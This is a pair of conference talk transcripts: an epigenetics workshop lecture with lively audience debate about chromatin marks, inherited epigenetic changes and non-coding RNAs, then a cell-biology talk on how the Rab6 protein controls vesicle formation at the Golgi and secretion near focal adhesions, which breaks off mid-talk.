You can distinguish what is called euchromatin, which is only slightly compacted and includes the active genes, from heterochromatin, which is highly compacted and includes the inactive genes. Chromatin compaction is controlled by chemical modifications of the chromatin. The DNA can be modified: it is methylated. And the histones, the proteins around which it is wrapped, can also be modified: they have little tails protruding out of the nucleosome which can be acetylated, methylated or phosphorylated, and you have all sorts of combinations of these modifications of the histone tails. These combinations of modifications are specific to the different types of chromatin. In heterochromatin, the highly compacted, inactive chromatin, the DNA is methylated, the histones are deacetylated, and you have methylation on certain residues of the histone tails, such as H3K9, for example. In contrast, in active chromatin, in euchromatin, the DNA is demethylated, the histones are acetylated, and they are methylated on other residues, such as H3K4. You can actually measure these modifications one by one at the whole-genome level, and this gives you the epigenome of the cell. If you take the genome as a book, the epigenome tells you which pages are open; it is the epigenetic marks which select the open pages of the book. This, if you want, is the euchromatin: you can read it. This is the heterochromatin: you cannot read it. So if we come back to the question of the cells which come from a single cell and have an identical genotype, the difference is, at least in large part, due to the epigenome, because their epigenomes are different. If you take a stem cell, for example, genes A, B and C will be methylated and compacted, whereas in its daughter cell other genes will be methylated and compacted. So the pattern of genes which are open and the pattern of genes which are closed differ between these two cells. The main question therefore appears to be solved: we know what makes different phenotypes from a single genotype. But there are other open questions. One question which is very important is: can the epigenome be modified by external signals? It is a socially important question, because it covers the relationship between the genome and the environment, and you know all the problems created by the environment. Well, we know that external signals can modify the epigenome. For example, a ligand binds to a receptor, activates a transduction cascade, and eventually changes the chromatin very locally, at specific loci, from compacted to open, and activates the gene. At the level of the organism, if we come back to the bee model, it is in fact an external signal, the royal jelly with which the queen is fed, which makes the whole difference between the worker and the queen. The fact that the queen larva is fed with this type of food modifies its epigenome and makes a queen. It has been shown that some genes are methylated in the absence of royal jelly, which gives a worker, whereas these genes are activated by the royal jelly, and they control the size, the reactivity and so on of the future bee. In mammals too, we have many examples of the effect of an external signal on the epigenome.
Here, for example, is the case of mice born from a stressed mother. When the mouse is pregnant, you stress it, with different noises or things like that. The mice born from a mother stressed during pregnancy are themselves stressed, whereas mice born from a well-treated mother are not. And this has been linked to the methylation of a gene which is expressed in neurons and whose defects are associated with schizophrenia: in the mice born from the stressed mother this gene is methylated, whereas in the mice born from a well-treated mother the gene is not methylated, so it is expressed. So clearly the environment, nutrition, external conditions affect the epigenome. Now, another very important question, and this one is not solved at all, is: can epigenome modifications be transmitted to the next generations? If we take a somatic cell, for example a culture of fibroblasts, differentiated cells, then all the daughter cells of this fibroblast will be fibroblasts, which clearly indicates that the epigenome is transmitted from the mother cell to the daughter cells, despite the fact, and I think it is a very interesting question, that during mitosis the chromosomes are highly condensed, the most condensed form of the chromosome; despite this they maintain the information, and actually we don't know how. But now, if we take not the somatic cells but the germ cells, is the epigenome transmitted to the descendants? There are actually numerous studies in mouse and human suggesting that it might be the case. If we go back to the stressed mice: the mice which are born from stressed mothers are stressed, but they also have a good probability of themselves giving birth to stressed descendants, raising the possibility that this epigenomic feature has been transmitted. There are numerous studies like that in the literature. However, this is a very controversial issue, as these experiments are very difficult to interpret. Is the effect due to molecular transmission of the epigenome to the embryo through the germ cells, or is it due to cultural factors and behavioral transmission? The stressed mother is stressed; she deals with her infants in a very specific way. Or a blood factor: she is stressed, so there is a particular hormone? Exactly, it can be. Stress is chemical, isn't it? The stress is chemical, but the way the children receive the stress will induce a chemical reaction in them as well. But the transmission is... The embryo was receiving this hormone, and who cares what it receives afterwards: the embryo in development was chemically modified? Yes, but if it gives birth, the same embryo will itself give birth; it keeps a chemical signature, not a behavior. Well, we will see that it cannot keep this chemical signature, at least not at the epigenomic level, because, if we move directly to the next slide, the epigenetic marks are erased during development; they are almost completely erased. So you can always say that maybe the "almost" is the explanation. It was chemistry in the blood of the mother; it is erased here, but then beyond development, this chemistry of the mother... Yes, that is how it develops. But that is OK for the first generation.
No, no, but I see what Michel is saying: this is OK for the first generation, but it is not OK for the second or sometimes the third generation. OK, so here are, for example, the methylation marks: you have the DNA from the mother and from the father, methylated here, and then at a very important stage, which is actually the stage where the embryo proper appears, almost everything is erased; the epigenetic marks are lost. Then they reappear and you have differentiation of the cells. So how could the marks be transmitted if they are erased during development? This is a completely unsolved issue at this point. But you can ask the question: are the epigenetic marks the only players, or are there other players involved, at the genomic level of course? Good candidates are non-coding RNAs. Non-coding RNAs are transcribed from the non-coding genome, which means they have no open reading frame to make proteins. Previously the non-coding genome was called junk DNA, because it was thought to be absolutely useless; now it is rather called the dark genome. Why? In fact, the complexity of organisms is not correlated with gene number. Take, for example, C. elegans, which has not far from 20,000 genes: it is a little worm with very little complexity, and a very small animal as well. Compare that to humans: humans are thought to have about 24,000 genes. So there is very little difference in the number of genes; the complexity of an organism is not linked to the number of genes. However, it is inversely correlated with the percentage of coding sequences: the fewer coding sequences you have, the more complex the organism. In humans, 97% of the genome is non-coding. The whole proteome that you heard about this morning is encoded by only 3% of the genome; the rest is non-coding. If you take, for example, a human chromosome, the coding part is here in red, and all the rest is non-coding. For a long time this non-coding genome was of no interest at all; again, it was called junk DNA. Then the discovery of small non-coding RNAs triggered interest in the non-coding genome. These small non-coding RNAs are the microRNAs that I am sure you have heard about many times. They were discovered in C. elegans, and they are very small RNA sequences which bind to messenger RNAs and prevent the synthesis of protein, the translation of the messenger RNA. But small non-coding RNAs represent a very small part of the non-coding genome: they are very short, and there are a few thousand of them, so they do not account for the whole thing. We now know that almost all of the genome, even more than 70% of it, is transcribed. We know this thanks to the new sequencing technologies, which allow us to see molecules that are very poorly represented in a population, because with these technologies we sequence molecules one by one, so if you sequence enough molecules, even a very rare molecule can be seen. And because the transcription of the whole genome does not give rise to very abundant RNAs, it had been totally missed until now. But now we know that almost all of the genome is transcribed, and it is mostly transcribed into long non-coding RNAs.
And we actually know that long non-coding RNAs are able to modify the epigenome. It has been known for a very long time that there is a non-coding RNA called XIST which coats one of the X chromosomes in the somatic cells of mammalian females, resulting in the epigenetic silencing of the entire chromosome. You need dosage compensation for the X chromosome, so that males and females have the same level of expression of the genes on the X; in nature there are different ways to achieve that, and in mammalian cells one of the X chromosomes is inactivated, thanks to this long non-coding RNA, although the precise mechanism is not known. Is it known whether every single one of these bits of RNA is actually functional? No, of course not, not yet. How will you determine that? Well, it is really starting now; it has been going on for, I would say, five years. What you do, as usual, to analyze the function is to kill the molecule. But you said 70% of the genome is transcribed, even more than that; how are you going to walk through 70% of the genome and eliminate every single piece? That is insane. Well, you will have to, because there is no way you can make a cell with only the 3% of coding DNA. So how would you test that? What people are doing right now is looking at specific long non-coding RNAs which are differentially expressed in this or that situation, healthy cells versus some disease, or cancer, or whatever, and then they look into those differentially expressed ones. I think it is a little bit like what was done with genes at the beginning: people looked at one gene which was differentially expressed, and we did not have the whole genome sequence, and so on. Now, if the question is whether someone has imagined a way to prove that all of these sequences are functional, I don't think anyone has at this point. Come on, we know that most of it is not functional, because most of it is not under constraint. Well, I don't think that is the right answer, and I have a slide at the end about this, but we can have the discussion now. I don't think it is the right answer, because if you consider only evolutionary constraint, then you will say that only the coding part matters, and then you will conclude that there is almost no difference between a mouse and a human, because the genes are 99.9% the same. So you have to admit that a region without constraint plays a role. Is there, in fact, a big difference between a mouse and a human? Biologically, I think, it is negligible. With all due respect, objectively, why is there a big difference between mouse and human? The difference may not be big, but it is the most important part: we do not have whiskers. No, I have the feeling it is a little more than that. Actually, Misha, you know that the mouse is not a good model for most diseases, because the mouse does not behave like the human. It is not more complex, but it is different. But at least you need to have a measure. What do you mean, at least? Well, you have this measure.
The only point one can make is that a mouse is different from a human, but if you take the genes, the enzymes and all that, they are very, very alike. In a way they are not different; the question is what you emphasize. Its appearance is different. It is not only the appearance: even biologically the mouse is different, for example the lifespan, a mouse lives two years. There are a number of parameters; if you look at them, there are a thousand parameters on different scales. One parameter is the size; come on, that is not a big difference, being small. Another parameter is thinking, which the mouse does not have, at this point, or maybe it does, but not the same type of thinking. We tend to overemphasize humanity; our perspective is biased by our own point of view, that is my point. What you are saying is that we are animals, and I think that is absolutely correct. But then there are many differences, and it is not only mouse versus human; it is also, again, the C. elegans worm, which is completely different, even though many, many genes are in common. Actually, the coding sequences of mouse and human genes are almost identical. That is actually a good point, because what is very diverse is the non-coding region. Exactly, that is my slide, actually, my last slide. Let's move to the last slide, the one that could determine, theoretically, what a mouse is. Exactly, that is my last slide; maybe we can skip ahead to it. OK, so what we can think is that maybe non-coding RNAs keep the memory: they might be in the cytoplasm of the maternal egg, or they might be associated with the sperm DNA, whatever, but they could keep the memory of these epigenetic marks. And so we come to the last slide, with all the open questions. Non-coding RNAs come from 97% of the genome; they are thus a huge molecular reservoir with which to explain yet unexplained functions, and there are many functions which are not explained simply by genes. Also, and that is exactly the point of the discussion, in contrast to protein-coding genes, which can be very similar between species, non-coding RNAs are highly variable; they are not submitted to the same constraints from one species to the other, or from one individual to the other within the same species, so they have the potential to play an essential role in the differences between species and in the differences between individuals within a species. Yes? I just want to come back to your point about the coding regions being the same. That is like saying that in a human the eye cells are really different from the cells on your hands, right? The difference between a mouse and a human has nothing to do with different coding regions; it has to do with the way the coding regions are regulated. Yes, but in total, within an organism, yes, but in total, if you take the human and the mouse genomes, they are not identical but very similar. Yes, but it is not about the actual sequence; it is about what is being regulated, what is being transcribed and when; the timing of expression might be different. But actually, the non-coding region can regulate the expression of the coding region. Of course. So because the non-coding region is different, it could determine the difference in the expression. Of course.
But my feeling, and it is only a feeling, of course, is that the non-coding region does not do only that. Right now we see it through the eyes of genetics and the coding sequences; everything always comes back to the coding sequences, everything is due to genes and proteins. I don't think that is the whole story, and I have the feeling that the non-coding RNAs play a role, for example, in brain function. But you started with the difference between different cells in the same organism, brain and gut and whatever other cells, and about that we already asked biologists to record development, and we have the answers already in the genome, because we have the transcription factors and the enhancers. I am not saying it explains everything, but we are beginning to understand it without looking at the non-coding part. We know at least one example exists where a non-coding RNA is functional, so there will be more, although we don't know how it works. No, but at least we know what it does; here we are throwing 97% of the genome at biologists and asking them to figure out what it does. But the question is a good question, of course. Now, I don't think that the whole of development is due to the genes, and if you take the example of the microRNAs, they were absolutely unknown, and we did not even suspect that these things were working, so I would not dismiss this. One point we cannot ignore: it is not completely true that they are under no constraint, because in different species they keep the same position on the chromosomes, and this seems to be related to chromatin organization maps. The sequence is under less constraint, and there are differences in the non-coding genomes; there are parts which are more conserved and parts which are less, but their chromosomal organization seems to be conserved across species, and there may be some functions, at least for part of them, related to this chromatin organization. Yes. What you are saying, if I understand it properly, is that there can be common functions between species for the non-coding RNAs, and what I am adding is that there might also be species-specific functions, or even individual-specific functions. All right. Let's suppose that you make an artificial genome where you get rid of everything and keep only the open reading frames. What would happen? I don't think anything good; maybe we should do it, but I don't think the cell would live. I don't think it would live. It's the kinetics. Chromatin will not form? The chromosome? No, no, I didn't say that; I said that you get rid of this part. So you make only one small chromosome, one small chromosome with the coding sequences? I think, actually, the way chromatin is organized in a particular shape, you need this mechanically, no? No, no. So what I am saying is that you convert a human being into a yeast, and I don't mean that literally. But I am not sure that a human cell would live. I don't know; I wish... we would have to try. We would have to try. Because the rest of the cell, and I am not saying that I am right, OK, it is just what I think, the rest of the cell has been designed, well, not designed, but has evolved to work with a complex genome, and I am not sure.
I am not sure what would happen if you took that away, but it would be an interesting experiment to do. And actually, I have a kind of provocative question. You explained to us the epigenetic marks, which are connected with chromatin and so on, and now you talk about non-coding RNAs; so of course the third question is how you suggest they interplay, how these non-coding RNAs can be involved? Yes, I did not go into the details, but for example XIST: the XIST RNA modifies the epigenetic marks on the X chromosome which is inactivated, and there are other examples of that. So non-coding RNAs have the capacity to modify the epigenetic marks, but I don't think it is the only way they work, that is my point. OK, let's go on. No, Annick, you choose whom you want. You did not speak of plants; I think transmission up to 8 or 10 generations was shown a couple of years ago already in Arabidopsis, transgenerational epigenetic transmission, the Vincent Colot work; it made a big splash in the literature, so I wanted to know what the situation is. The problem is that in plants I don't know whether there is this erasure of the epigenetic marks; I am sorry, I am not a plant specialist, I don't have the answer. I know in mammals it occurs. So, a few comments. First of all, your experiment of getting rid of most of the genome and seeing what happens has been done in nature several times. For example, the puffer fish has a genome which is 100 times smaller than that of other fish and of humans, and it is still a fish; so this proves that most of the non-coding genome is not required to make a fish. For this fish. So why do we study all this? Please, if I may comment: if the evolutionary constraint is so strong and we don't need this 97% of the genome, why has it been kept during evolution? This is population genetics: genome size is not correlated with complexity in any way. Genome size has to do with the strength of natural selection; species which have very small effective population sizes have very big genomes, like plants. Humans have a very small effective population size; we went through a bottleneck in our history, and this is why our genome is full of rubbish. This is very well understood. Bacteria and fungi have very large effective population sizes and very strong natural selection; every single base pair is under selection and has a fitness cost when you add something. Actually, it is not absolutely correct, because, coming back to plants: in plants it is well known, for example, that if you cut out at least half of the non-coding genome of Arabidopsis, you get a normal plant. But this is only in plants, and maybe only Arabidopsis; still, it is a very interesting thing. Maybe it is somehow connected with the fact that in animals we have much less plasticity than in plants. But you just made the opposite point: the fish is a natural experiment. I told you so, so you agree. I agree, I agree, then I agree, yes, but I don't know about animals.
He is telling you about animals; the same thing happens in animals: you have very different genome sizes for animals which are very similar to each other, so genome size is not related to complexity, and you do not need most of that DNA. But you are talking about comparison and I am talking about experiment; it is not the same, because a comparison still does not give the actual result. OK, but they agree with each other. Another thing is the measuring of which bits of the genome are important. There are two ways to do this. One is by conservation during evolution, and this estimates that roughly 8% of the human genome is under constraint, as in it has been under selection during primate evolution. The other one, now that we have so many sequences of individual human genomes, is to measure the allele frequency, the frequency of mutations at every base. The human population is large enough that every generation amounts to a saturation mutagenesis of the human genome: somebody is born with a mutation at every position that is compatible with life, and by sequencing millions of genomes we now know the frequency at which mutations occur in the population. But when you say sequencing, is it the whole genome or only the...? It is mostly exomes, which are becoming whole genomes, and as this gets bigger and bigger we will be able to measure exactly how important every base of the human genome is. So this is the other way to answer your experiment: we will have the numbers to say this base is exactly this important for fitness. But again, this is not taking into account the individual differences. Maybe this base is very important in general, but this other base, which is only present in two people, is the one base which makes the difference between those two people. Excuse me, I don't understand where this 97% figure comes from, then. I did not do the experiment myself, but it is the percentage of DNA without an open reading frame of sufficient size to make a protein. Because what I heard is that something like 8% has been shown to have some function. Well, it depends on the species; in humans it is 3% coding, in other species it is more. No, but the 97% is definitely not all non-coding RNAs, that is the point; a lot of it is... A lot of what, not transcribed at all, you mean? Well, of course; at least there are parts of the genome that we cannot even sequence properly, so we cannot know whether they are transcribed or not, but it is going to approach 100%, of course. So why are you so focused on the genome? There are many more molecules which are passed from one generation to the next; you have germ plasm and glycoconjugated proteins and whatnot; I am just curious to know. They might play a part, but at some point you have to remodel the genome, because after the erasure of the marks you have to re-establish the marks, and you start with a stem cell, and so on. And glycoconjugates, could they induce the epigenetic modification? Yes, why not, but at this point it has not been proven that any sugar influences the genome, I mean a stretch of the genome. Did anybody ever do an experiment by microinjection of long non-coding RNAs into an oocyte, at fertilization, to show that they actually affect the outcome? Not yet. So how do we know they are important? It is all correlation. It is an open question, again.
It is not a demonstrated fact. Why don't they do the experiment? She wants us to do it; she is just suggesting an idea, that's it. I totally agree that this is not proven, but there are many examples of RNAs, non-coding RNAs, which modify the genome. XIST exists, and there is another one which is very interesting: Paramecium. Paramecium has two nuclei, a micronucleus and a macronucleus. The micronucleus contains the whole genome and is very condensed; it is like the storage form of the genome. The other nucleus, the macronucleus, is very large, has uncondensed DNA, and is the part which is expressed. During cell division, the micronucleus gives rise to a new micronucleus and a new macronucleus, and in the macronucleus the sequences which are not expressed are deleted, and this is directed by RNAs. So there are examples, many examples. But it is Paramecium, not a mammal. No, sure, of course. But it is exactly in Paramecium that you have non-DNA heredity, Sonneborn; that is exactly the history of the field. No, but I am not talking about the genetics of the animal, I am talking about the molecular mechanism, which is something different. Yes, of course, but the molecular mechanism exists, that is what I am saying. In C. elegans it was also shown, genetically. But in a way microRNAs are not such a good example of these long non-coding RNAs, because they have their own genes; they are transcribed as genes, just not protein genes; they are still not this junk, this dark matter. Yes, but long non-coding RNAs are not protein genes either; they are transcribed too. There is a long association between long non-coding RNAs and disease, for example in cancer. Yes, absolutely, and I believe in diabetes as well. In cancer, several long non-coding RNAs are really being looked at now. And 50% of these long non-coding RNAs can code for micro-proteins. Right, yes, that is right, but it has not been proven that these micro-proteins... Some of these micro-proteins are very important. Yes, I am aware of that; they are very small polypeptides, very small peptides actually, so it is not proven that they all have a function at this point, but yes, they are part of this non-coding story; they have very small open reading frames. Are they synthesized? Many of them are not synthesized. No, they are synthesized and they have a function. Well, the function is not certain, but they are synthesized. Could they simply be degradation products? If they are very small, they could come from the digestion of larger proteins. One reason why long non-coding RNAs are studied is also that in different tissues they have reproducible expression patterns: if you take liver or neurons, you see the same long RNAs expressed in the same tissues, and this is one reason why, at some point, people try to understand what they do in the cell, because there are reproducible expression patterns for these long RNAs in the respective tissues. Well, but that is a correlation, and it could also be due to the different transcription factors present in the different tissues.
Right, so they do seem to be under some regulation. Yes. OK, so we can take one last question. Do we have one? Everybody is angry, I think. Everybody is angry.
|
In this workshop, I will review the molecular bases of epigenetics, as well as some essential yet unsolved questions, which will be a subject of further discussion. As part of it, a new hypothesis on the role of small non-coding RNAs in epigenetics will be presented.
|
10.5446/50883 (DOI)
|
OK, thank you. So I am supposed to talk about a GTPase, is that what you said? OK. Thank you. I want to thank Nava for organizing this meeting; it is a great opportunity to interact with mathematicians. I should say that I am in charge of an interdisciplinary program that has been set up in Paris, whose goal is to foster interactions between biologists, physicists, mathematicians and chemists, so a meeting like this one is a good opportunity. As Kati said, I am going to talk about our favorite Rab GTPase, Rab6, and what I will say is complementary to what you have already heard. Let me first introduce this family of proteins. The Rab GTPases belong to the Ras superfamily which, as you know, contains many proteins: you have Ras, Rho and Rac, Cdc42, Sar1 and the Rabs. All these proteins, which are also called small GTPases, have essentially the same structure: a molecular weight of 20 to 25 kDa and a conserved domain involved in GTP binding and GTP hydrolysis. The Rab GTPases form the largest family within this Ras superfamily: about 70 members have been identified in humans, and we do not know the exact function of most of them. What we do know is that the main functions of the Rab family are related to intracellular transport: they regulate vesicular transport. Rab GTPases participate in the budding of transport carriers; they are involved in the movement of these carriers along the microtubule and actin cytoskeletons, and among the main effectors of Rab GTPases are molecular motors, myosins or kinesins. Rab GTPases are also involved in the targeting of these vesicles to an acceptor membrane; in particular, they recruit protein complexes known as tethering factors. Another point, which I will not address today, is that Rabs cycle between the cytosol and membranes, and this cycle is coupled to the GTP/GDP cycle of the protein. Another important role of Rab GTPases is to form membrane domains; these domains are used as signaling platforms and probably for many other cellular functions. The best-studied example is Rab5, which recruits a series of proteins to form a Rab5 domain on the early endosome membrane. So here is the outline of my talk today: I will first discuss the mechanisms that drive the formation of transport carriers at the Golgi; then, if I have time, some unpublished work suggesting that Rab6 is a general regulator of post-Golgi secretion; and finally, if time allows, a mouse model that we have generated to study the function of Rab6 in a specific cell lineage. Rab6 is one of the few Rab GTPases that are conserved through evolution up to mammals and humans. There are in fact four Rab6 isoforms; I will not go into the details, but I want to mention one feature that is unique among Rabs: two of these isoforms are generated by alternative splicing of the same gene. The two proteins are very similar, they localize to the same compartment, and they are probably not fully redundant, but we do not know exactly. In my laboratory we have been studying Rab6 function for a long time, using different models.
At steady state, Rab6 is localized to the Golgi complex, mainly on the trans side of the Golgi and at the TGN, the trans-Golgi network. Rab6 in fact regulates several transport steps. One of them, which I will not talk about today, is the retrograde pathway that connects the endosomal system to the Golgi, the sorting and recycling route towards the Golgi. This pathway is used by endogenous proteins but also by toxins, such as Shiga toxin, to enter and intoxicate cells. The other function of Rab6, which I will illustrate in a moment, is to regulate anterograde transport, the transport of carriers from the TGN to the plasma membrane. Rab6 is also involved in retrograde transport between the Golgi and the endoplasmic reticulum. The first part of my talk presents data on the mechanisms that drive the formation of carriers at the TGN. We published several years ago that Myosin II is required for the fission of these carriers. Here is the normal situation, a control cell in which Rab6 is fluorescently tagged: this is the Golgi, and these are all the vesicles that move away from the Golgi towards the cell periphery. If you block Myosin II with an inhibitor, blebbistatin, what you start to see are tubes that remain connected to the Golgi membrane; these tubes correspond to carriers that cannot detach from the Golgi. We later reproduced this in vitro with Patricia: if you attach motors to a membrane in the presence of microtubules and you inhibit fission, you see the formation of these membrane tubes. We then tried to understand this machinery in more detail. What we did recently was to look carefully at what happens at the level of the Golgi. So this is now a zoom on the Golgi complex, with Rab6 labeling the Golgi, and you see all these vesicles leaving the Golgi membrane. If you look carefully, you see that the majority of the vesicles always form at the same places on the Golgi; this is what we call hotspots of vesicle formation on the Golgi. This is shown in more detail here, acquired with the same camera: you can track these vesicles, and if you look here, you see that one vesicle leaves and then another one forms at the same place. You can also show that if you treat with blebbistatin, which blocks Myosin II activity, then, as I showed you, these tubes stay connected to the Golgi membrane because fission is defective. This process is reversible: you can wash out the blebbistatin, the secretory pathway starts again, the tubes disappear and vesicles form again. And if you look carefully, you can see that these membrane tubes also form at the hotspots on the Golgi membrane. So the question was to understand how these hotspots of carrier formation are generated, and we wondered whether there is a connection between the actin and microtubule networks that could explain them. As I told you, Myosin II is involved in the fission process, and we had also shown, a long time ago, that Rab6 interacts with a kinesin, which at the time we called Rabkinesin-6.
So we recently readdressed this question and looked at the localization of KIF20A at the Golgi. As you can see, you can detect a pool of KIF20A that colocalizes with the Golgi marker GM130 and with Rab6, which is present on the Golgi. There is also a specific inhibitor of KIF20A called paprotrain; this inhibitor was in fact developed with a small company as an anti-cancer strategy, to block mitosis in cancer cells. To our surprise, because at the beginning we thought this kinesin was a motor that moves the vesicles along microtubules, this turned out not to be the case: when you inhibit the ATPase activity of the kinesin with this inhibitor, you also see the appearance of the membrane tubes that we had described after inhibition of Myosin II, which means that KIF20A is also involved in the fission of these carriers. We then looked at the localization of these proteins, Rab6, Myosin II and KIF20A: you treat the cells with the inhibitor, you look at where the proteins are localized on these membrane tubes, and you can see that at the base of the tubes you can detect KIF20A, which is an argument that the three proteins may work together in this fission machinery. In fact, from work in our laboratory and in others, we knew that Rab6 interacts with KIF20A, and Rab6 also interacts directly with Myosin II, so there is a whole network of interactions between the three proteins. To go further, we could show that there is a complex between the three proteins: you can co-immunoprecipitate them. We could also show that the interaction between KIF20A and Myosin II requires Rab6. This is shown on this blot, a classical experiment: you immunoprecipitate KIF20A, either KIF20A-GFP or the endogenous protein, and you see that Myosin II co-immunoprecipitates with it. Now, if you remove Rab6 by siRNA, you can no longer co-immunoprecipitate Myosin II, which means that Rab6 is needed for the interaction between the two proteins. We could also show that KIF20A is required for the recruitment of Myosin II onto Golgi membranes. This is shown in this experiment: in the control situation you quantify the Myosin II signal that you can see at the Golgi membrane; if you deplete Rab6A by siRNA, you decrease the recruitment of Myosin II to the Golgi, which means that Rab6 contributes to recruiting Myosin II; and if you deplete KIF20A, you also decrease the amount of Myosin II at the Golgi. To better understand what is going on, we treated the cells with nocodazole and then performed a microtubule regrowth experiment. As you know, the Golgi is able to nucleate microtubules, and these Golgi-derived microtubules are used for post-Golgi trafficking from the Golgi.
So if you do this — you treat the cells with nocodazole and then wash it out — you can see that KIF20A colocalizes with the microtubules growing from the Golgi. And the last experiment I want to show you before the model is a FRAP experiment. What we did was to photobleach GFP-RAB6: you bleach a region of the Golgi, you follow the RAB6 signal and you look at the recovery of fluorescence. In this way you essentially measure the diffusion of RAB6 in the plane of the membrane. If you use the KIF20A inhibitor, you see that the half-time of recovery decreases, which means that RAB6 diffusion is faster when you inhibit KIF20A. So let me show you the model — I should also mention that we measured the relative affinities between the three proteins. So here is the model. What we think is the following: this is a Golgi/TGN membrane. The first event is that RAB6 diffuses in the plane of the Golgi membrane. RAB6 probably first recruits KIF20A, then Myosin II, and this forms a complex between the three proteins. Then a vesicle buds from the Golgi, the nascent vesicle is pulled out along microtubules, and the actomyosin network is used to cut the vesicle off the Golgi. So this is a rather rare example of a coupling between actin and microtubules to form a vesicle at the Golgi. OK, so the second part of my talk... Yes, we can go back to the first slide for a second. The numbers 1, 2, 3, 4, 5 indicate the order. Do they go around, like in a circle? No, no — it is a model. We put the numbers to say: first you have RAB6, RAB6 recruits the second component, then the third, and so on; at 4 and 5 the vesicle forms, then the vesicle is cut and leaves the Golgi. So it is not that it can happen anywhere — it goes 1, 2, 3, 4 and then 5? Yes — maybe the model could be drawn a little better; I see what you mean. It could be another spot here — it is just the order of events, it is not spatial. The events probably take place at the same location, or very close to each other. A very good question: do you think there is an involvement of the GTPase cycle, that the GTP cycle of RAB6 really regulates the model? Yes, I think there is probably a cycle involved. For RAB6 we do not know exactly the GEF and the GAP, so it is difficult. And within the model it is not a special spatial distribution — as Thomas said, it is the order of events. Excuse me, I am lost about what Myosin II does here; I did not understand. What we think is that if you inhibit Myosin II, you cannot cut off the vesicle, so we think Myosin II is involved in the fission. Do you know how? No. There are several hypotheses. We are trying, with Patricia, to reconstitute this fission event in vitro, on giant vesicles.
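For readers who want to see how a recovery half-time of the kind quoted above can be extracted, here is a minimal sketch — not the speaker's pipeline — that fits a single-exponential recovery to a bleached-region intensity trace; the synthetic trace, the single-exponential assumption and all names are illustrative only:

    import numpy as np
    from scipy.optimize import curve_fit

    def single_exp_recovery(t, f0, f_inf, k):
        # F(t) = F_inf - (F_inf - F0) * exp(-k t); half-time = ln(2)/k
        return f_inf - (f_inf - f0) * np.exp(-k * t)

    # toy trace: time (s) and normalized fluorescence in the bleached Golgi region
    t = np.linspace(0, 60, 121)
    rng = np.random.default_rng(0)
    trace = single_exp_recovery(t, 0.2, 0.9, 0.08) + rng.normal(0, 0.02, t.size)

    p0 = [trace[0], trace[-1], 0.1]                # rough initial guesses
    (f0, f_inf, k), _ = curve_fit(single_exp_recovery, t, trace, p0=p0)
    t_half = np.log(2) / k
    mobile_fraction = (f_inf - f0) / (1.0 - f0)    # assumes pre-bleach intensity normalized to 1

    print(f"half-time of recovery: {t_half:.1f} s, mobile fraction: {mobile_fraction:.2f}")

Comparing such fits between control and inhibitor-treated cells is one way to turn "recovery is faster" into a number: a shorter half-time corresponds to faster apparent diffusion of the bleached pool.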
There are several possibilities. Also, we do not know exactly how the actin is organized at these sites. We know actin is there, but how is it arranged — is it a branched network or bundled filaments? One possibility — maybe Patricia can explain it better than me — is that Myosin II generates a contraction, and there are studies showing that Myosin II contraction can induce phase separation in the membrane, and this phase separation could be directly involved in fission. But, I mean, we do not know. Do you know whether actin nucleators are involved — do you have candidate nucleators? Yes, we know that actin nucleators are present on the Golgi — you saw CDC42, and CDC42 is also involved in this process. Have you looked further? That is a good question. I think we have some data with Arp2/3, and it seems that Arp2/3 could be present at the hot spots, but it is not settled. OK, the second part of my talk, which is not yet published, is some evidence suggesting that RAB6 could be a general regulator of post-Golgi trafficking. For this we used an assay called the RUSH assay, developed by Franck Perez's group at the Institut Curie, in the cell biology department. It is an assay based on the streptavidin system. Briefly, you express a streptavidin hook in the ER and you tag the cargo with a streptavidin-binding peptide. Under normal conditions this retains the secretory cargo in the ER. You then simply add biotin — the vitamin — to the medium; the association between the cargo and the hook is released, and secretion proceeds. I will show you. You can do this with a large variety of proteins. Today we will talk about three cargos that we followed: one is a GPI-anchored protein, another is a transmembrane protein, TNF-alpha, and the last one is a soluble cargo, Collagen X, which you heard about in Alberto's talk. OK, just to illustrate the system: this is CD59. At the beginning of the experiment CD59 is present in the endoplasmic reticulum. You add biotin to the medium, and you can see that the protein leaves the ER, reaches the Golgi, and then reaches the plasma membrane. So it is a very good way to synchronize transport between the ER and the plasma membrane. I can also show you Collagen X — it is the same: at the beginning of the experiment Collagen X is in the ER, you add biotin, and then you see these vesicles carrying Collagen X; since it is a soluble protein, it is released into the medium. OK, so in doing this we looked carefully at where on the plasma membrane exocytosis occurs, illustrated here with Collagen X. This is the movie: after about ten minutes the majority of the protein is in the Golgi, and then it reaches the plasma membrane and the extracellular medium. Let me run the movie.
And at the end of the experiment you see very little signal, because Collagen X has probably diffused away from the cell into the extracellular medium. So what we did was to set up an assay: the cells are grown on coverslips, and you coat the coverslip with an antibody against GFP. All these cargos carry a GFP tag, so when the cargo is released into the medium after exocytosis, the secreted protein is trapped on the coverslip at the site where exocytosis occurred. If you do this — again the same experiment, except that it is now done on antibody-coated coverslips — what you can see, and I show you the movie again with the GFP signal, is that at the end of the experiment exocytosis has not occurred randomly over the plasma membrane; it occurs at defined sites. The pictures are not great — they look better on my computer — but if you co-stain the cells with paxillin, which is a marker of focal adhesions, you can see that all these cargos are in fact exocytosed at the plasma membrane very close to the focal adhesion sites. Now, this is a complicated slide, so I will go quickly. As you know — maybe I did not mention it — post-Golgi trafficking depends on microtubules; all these vesicles move along microtubules towards the plasma membrane. If you do this experiment you can track all these vesicles with the different markers, and what we could show is that the vesicles that leave the Golgi and go to the plasma membrane near focal adhesions use microtubule tracks, and in fact they tend to use the same microtubules over and over: among the many microtubules present, the same tracks can be used several times to transport these carriers. OK, so to continue, what we did was to ask what the machinery present near focal adhesions could be. In fact, this was worked out about ten years ago by the group of Anna Akhmanova, now in Utrecht. What is known in the field is that near focal adhesions there is a link between microtubules and the adhesion site. One of the players in the formation of this site is a protein called ELKS, also known as CAST, a protein of the active zone in neurons. This protein helps anchor microtubules near focal adhesions, and importantly, ELKS is an effector of RAB6. In this experiment, this is the control situation: you can see GFP-ELKS — it is localized on the plasma membrane, but it is also concentrated at focal adhesions, as suggested by the model.
